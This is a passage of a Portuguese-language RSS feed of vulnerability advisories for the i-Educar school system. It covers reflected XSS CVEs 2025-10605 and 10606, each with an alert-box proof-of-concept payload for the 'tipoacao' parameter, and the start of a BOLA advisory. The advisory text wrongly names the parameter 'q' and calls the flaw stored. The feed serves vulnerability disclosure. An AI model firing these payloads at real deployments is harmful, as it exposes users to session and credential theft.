        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10591.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10591.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10605</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10605/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10605/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10605-cross-site-scripting-xss-refletido-no-endpoint-agenda_preferenciasphp-parâmetro-tipoacao&amp;#34;&amp;gt;CVE-2025-10605: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10605&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10605&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/agenda_preferencias.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10605-cross-site-scripting-xss-refletido-no-endpoint-agenda_preferenciasphp-parâmetro-tipoacao&amp;#34;&amp;gt;CVE-2025-10605: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10605&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10605&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;agenda_preferencias.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/agenda_preferencias.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;&amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nx&amp;#34;&amp;gt;alert&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;(&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s1&amp;#34;&amp;gt;&amp;amp;#39;XSS-PoC&amp;amp;#39;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;)&amp;amp;lt;/&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;script&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10605/image.png&amp;#34;
	width=&amp;#34;736&amp;#34;
	height=&amp;#34;565&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10605/image_hu_61255b2402b529c7.png 480w, /p/cve-2025-10605/image_hu_f2589c925b0a1d14.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;130&amp;#34;
		data-flex-basis=&amp;#34;312px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10605.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10605.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10606</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10606/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10606/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10606-cross-site-scripting-xss-refletido-no-endpoint-moduleconfiguracaoconfiguracaomovimentogeral-parâmetro-tipoacao&amp;#34;&amp;gt;CVE-2025-10606: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;/module/Configuracao/ConfiguracaoMovimentoGeral&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10606&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10606&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;/module/Configuracao/ConfiguracaoMovimentoGeral&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/module/Configuracao/ConfiguracaoMovimentoGeral&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10606-cross-site-scripting-xss-refletido-no-endpoint-moduleconfiguracaoconfiguracaomovimentogeral-parâmetro-tipoacao&amp;#34;&amp;gt;CVE-2025-10606: Cross-Site Scripting (XSS) Refletido no endpoint &amp;lt;code&amp;gt;/module/Configuracao/ConfiguracaoMovimentoGeral&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10606&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10606&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Refletido) foi identificada no endpoint &amp;lt;code&amp;gt;/module/Configuracao/ConfiguracaoMovimentoGeral&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;/module/Configuracao/ConfiguracaoMovimentoGeral&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;tipoacao&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;q&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;%22%3E%3Cimg%20src=x%20onerror=alert(&amp;amp;#39;XSS-PoC4&amp;amp;#39;)%3E
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-10606/image.png&amp;#34;
	width=&amp;#34;746&amp;#34;
	height=&amp;#34;542&amp;#34;
	srcset=&amp;#34;/p/cve-2025-10606/image_hu_84c786b72df371af.png 480w, /p/cve-2025-10606/image_hu_80ea8e8254996711.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;137&amp;#34;
		data-flex-basis=&amp;#34;330px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10606.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/marcelomulder/CVE/blob/main/i-educar/CVE-2025-10606.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/marcelo50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;http://www.linkedin.com/in/marceloqueirozjr&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Marcelo Queiroz&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 17 Sep 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-10607</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-10607/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-10607/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-10607-broken-object-level-authorization-bola-permite-a-enumeração-de-dados-de-classes-via-moduleavaliacaodiarioapi&amp;#34;&amp;gt;CVE-2025-10607: Broken Object Level Authorization (BOLA) permite a enumeração de dados de classes via &amp;lt;code&amp;gt;/module/Avaliacao/diarioApi&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10607&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10607&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de Broken Object Level Authorization (BOLA) foi identificada no endpoint &amp;lt;code&amp;gt;/module/Avaliacao/diarioApi&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa falha permite que um usuário sem as devidas permissões consulte o endpoint e recupere ** informações da turma** manipulando parâmetros de solicitação.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Embora essa vulnerabilidade não exponha diretamente dados individuais de alunos, ela ainda constitui uma &amp;lt;b&amp;gt;divulgação não autorizada de informações de estrutura acadêmica&amp;lt;/b&amp;gt;, que pode ser aproveitada para enumeração ou como um trampolim para ataques futuros.&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-10607-broken-object-level-authorization-bola-permite-a-enumeração-de-dados-de-classes-via-moduleavaliacaodiarioapi&amp;#34;&amp;gt;CVE-2025-10607: Broken Object Level Authorization (BOLA) permite a enumeração de dados de classes via &amp;lt;code&amp;gt;/module/Avaliacao/diarioApi&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;CVE Publication: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-10607&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-10607&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
